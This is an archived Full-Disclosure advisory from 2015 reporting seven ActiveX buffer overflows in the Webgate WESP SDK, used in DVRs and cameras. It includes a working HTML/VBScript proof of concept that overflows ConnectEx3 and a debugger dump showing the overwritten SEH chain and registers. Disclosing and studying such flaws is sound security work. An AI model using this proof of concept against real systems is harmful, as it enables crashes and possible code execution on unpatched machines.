lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CABjjeyn=w2rB4TxMddj1kBWV9k93wnw1YbdaHJk5rB4HsNWe-g@mail.gmail.com>
Date: Mon, 23 Feb 2015 23:14:08 +0530
From: Praveen D <praveend.hac@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] WESP SDK multiple Remote Code Execution Vulnerabilities

Webgate technology is focused on digital image processing, embedded system
design and networking to produce embedded O/S and web server cameras
providing real time images. We are also making superior network stand-alone
DVRs by applying our accumulated network and video solution knowledge.

WEBGATE Embedded Standard Protocol (WESP) SDK supports same tools in both
network DVR and network camera.

Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax
Technology, Fujitsu AOS Technology, inc

http://www.webgateinc.com/wgi/eng/#2
http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html

Vulnerability 1:  WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage
Buffer Overflow
Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword
Buffer Overflow
Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX
LoadImageEx Buffer Overflow
Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX
Connect Buffer Overflow
Vulnerabilit 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow
Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect
Buffer Overflow
Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX
ConnectEx3 Buffer Overflow


CompanyName WebgateInc
FileDescription WESPConfig Module
FileVersion 1, 6, 42, 0
InternalName WESPConfig
LegalCopyright Copyright (C) 2004-2010
OriginalFileName WESPConfig.DLL
ProductName WESPConfig Module
ProductVersion 1, 6, 42, 0

******************PoC for one of the above Vulnerabilities***********
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<!--
targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll"
prototype  = "Sub ConnectEx3 ( ByVal bDvrs As Integer ,  ByVal Address As
String ,  ByVal Port As Integer ,  ByVal UserID As String ,  ByVal Password
As String ,  ByVal extcompany As Long ,  ByVal authType As Long ,  ByVal
AdditionalCode As String )"
memberName = "ConnectEx3"
progid     = "WESPPLAYBACKLib.WESPPlaybackCtrl"
argCount   = 8
-->
<script language='vbscript'>

arg1=1
arg2=String(1044, "A")
arg3=1
arg4="defaultV"
arg5="defaultV"
arg6=1
arg7=1
arg8="defaultV"

target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8

</script>
</html>
******************************
Stack trace for above PoC
Exception Code: ACCESS_VIOLATION
Disasm: 76ACD33D MOV CX,[EAX]

Seh Chain:
--------------------------------------------------
1 41414141


Called From                   Returns To
--------------------------------------------------
msvcrt.76ACD33D               WESPPlayback.999539
WESPPlayback.999539           41414141
41414141                      22E5E0
22E5E0                        2F712C
2F712C                        41414141
41414141                      41414141
41414141                      41414141
41414141                      41414141


Registers:
--------------------------------------------------
EIP 76ACD33D
EAX 41414141
EBX 039E0040 -> 009DF298
ECX E0551782
EDX 41414141
EDI 76AD4137 -> 8B55FF8B
ESI 76ACD335 -> 8B55FF8B
EBP 0022E56C -> 039E0020
ESP 0022E56C -> 039E0020


Block Disassembly:
--------------------------------------------------
76ACD333 NOP
76ACD334 NOP
76ACD335 MOV EDI,EDI
76ACD337 PUSH EBP
76ACD338 MOV EBP,ESP
76ACD33A MOV EAX,[EBP+8]
76ACD33D MOV CX,[EAX]  <--- CRASH
76ACD340 INC EAX
76ACD341 INC EAX
76ACD342 TEST CX,CX
76ACD345 JNZ SHORT 76ACD33D
76ACD347 SUB EAX,[EBP+8]
76ACD34A SAR EAX,1
76ACD34C DEC EAX
76ACD34D POP EBP


ArgDump:
--------------------------------------------------
EBP+8 41414141
EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+20 00000829
EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Stack Dump:
--------------------------------------------------
22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00  [................]
22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00  [.q.......q......]
22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00  [.o..............]
22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]

P.S. CERT tried to coordinate with the vendor for fixing the issues but
there wasn't any response from vendor

Best Regards,
Praveen Darshanam

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists